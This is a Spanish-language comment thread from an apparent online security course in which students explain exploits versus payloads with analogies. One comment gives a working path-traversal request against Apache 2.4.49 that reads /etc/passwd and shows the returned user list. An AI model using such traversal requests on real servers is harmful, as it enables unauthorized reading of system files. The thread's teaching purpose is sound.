Todos los exploit necesitan un payload, el exploit ejecuta la vulnerabilidad y el payload hace la acción en el sistema.
Veamos la definición de cada uno.
Qué es exploit
Hace referencia a los pasos a seguir o el método que se refiere para explotar una vulnerabilidad. También se hace referencia al scripts, código o programa que explota la vulnerabilidad de manera automática.
Que son payloads
Se encarga de ejecutar una acción dentro del sistema explotado. Puede ser el comando para ejecutar una acción donde puede establecer una conexión entre el atacante y el sistema infectado y poder controlarlo.
Contribución creada con los aportes de: Angie Espinoza (Platzi Contributor) y GTBche
Hace referencia a los pasos a seguir o el método que se refiere para explotar una vulnerabilidad. También se hace referencia al scripts, código o programa que explota la vulnerabilidad de manera automática.
Payload:
se encarga de ejecutar una acción dentro del sistema explotado. Puede ser el comando para ejecutar una acción donde puede establecer una conexión entre el atacante y el sistema infectado y poder controlarlo.
El exploit es el caballo de troya y el payloads es la sorpresita que lleva dentro jajajaja
++El objetivo es la carpeta etc y el archivo password.++
El exploit es: /cgi-bin/ /.%2e/%2e%2e/%2e%2e/%2e%2e
El payload es: /etc/passwd
El resultado en el sistema Linux: todos los usuarios
HTTP/1.1 200 OK DATE: Tue, 05 Oct 2021 14:51:37 GMT Server: Apache/2.4.49 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Fri, 18 Jun 2021 09:31:30 GMT ETag: “820-5c506fd229535” Accept-Ranges: bytes Content-Length: 2080 Vary: User-Agent Connection: close root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12👨/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System
Traducción please...
con ese trucazo de los ../ encodeados ya tengo arto por probar jeje
Para que no les pase lo mismo que a mi: Asegúrense de dar clic en "Decode" en la parte superior de la página. Por default está en "Encode" y obvio no arroja los resultados esperados.
Rooms de tryhackme para llevar a cabo los exploit y payloads
Agent Sudo
SteamCloud
Ignite
Jacob the Boss
Exploit:
Es un programa o script que se encarga de axplotar una vulnerabilidad en un sistema
Payload:
Es la carga útil que lleva ese exploit, se encarga de ejecutar comandos que hacen una acción deseada, por ejemplo establecer una conexión entre la máquina objetivo y el atacante.
2:18 En esta parte el profesor quizo decir "El Payload" no el "Exploit", aunque luego lo clarifica.
ty
Yo lo explicaría con la siguiente analogia:
Imagina que el software es un hogar. La vulnerabilidad sería una chapa desgastada, un punto débil en la puerta que facilita la entrada. El exploit sería la herramienta que aprovecha esa debilidad para forzar la chapa y abrir la puerta. El payload sería el ladrón que, gracias al exploit, ingresa y realiza las acciones dañinas, como robar información o instalar malware.
Muy buen ejemplo, gracias
<u>Payload y Exploit</u>
En el mundo de la seguridad informática, te encontrarás con dos términos muy importantes: exploit y payload. Vamos a ver qué significa cada uno:
Exploit: Un exploit es como una herramienta que se aprovecha de una debilidad o vulnerabilidad en un sistema informático. Piensa en ello como una palanca que se usa para abrir una puerta a la fuerza. Los exploits pueden estar escritos en código y aprovechan errores de programación o fallos de configuración para obtener acceso no autorizado a un sistema.
Payload: El payload es la carga que se entrega a través del exploit. Siguiendo con la analogía de la puerta, el payload sería lo que entra por la puerta una vez abierta. Puede ser cualquier tipo de código malicioso, como un virus, un troyano, o un programa que robe información. El payload es el que realiza la acción dañina que buscan los atacantes.
En resumen, el exploit abre la puerta (aprovecha la vulnerabilidad) y el payload entra por esa puerta (ejecuta la acción maliciosa).
El exploit es Invitar a tu pareja a ver Netflix y el Payload es lo que hacen cuando no ven Netflix ;D
jajajaja fino
muy buena la explicación entre exploits y payloads
con los exploits podemos aprovechar una vulnerabilidad y poder acceder a un sistema y abrir una terminal ó una shell, y el payload es el código a ejecutar para cumplir con un objetivo, como ejecución remota, troyanos, registradores de teclas,etc
Payload-> codigo para realizar la accion final una vez que un sistema fue vulnerado
El meme es buenísimo después que se explica 🤣🤣🤣🤣
Muy interesante la diferencia entre los exploits y los payloads entendí perfectamente.
Lo compararía con un trozo de salmón con parásitos que afectan la salud de una persona.
Vulnerabilidad: El estómago humano es susceptible a parásitos en carne cruda.
Exploit (Salmón crudo): El código diseñado para aprovechar esa susceptibilidad y entrar.
Payload (Anisakis): El código malicioso que hace el trabajo sucio (robar datos, destruir archivos, etc.) una vez dentro.
Como entendí es que el exploits básicamente es un visitante de nuestra casa que quiere entrar a las puertas de los cuartos que no le hemos dado acceso, este no puede ingresar si no hay un payloads que le permita ingresar. Es decir, busca la manera pero no sabe que tipo de cerraduras tenemos o las llaves.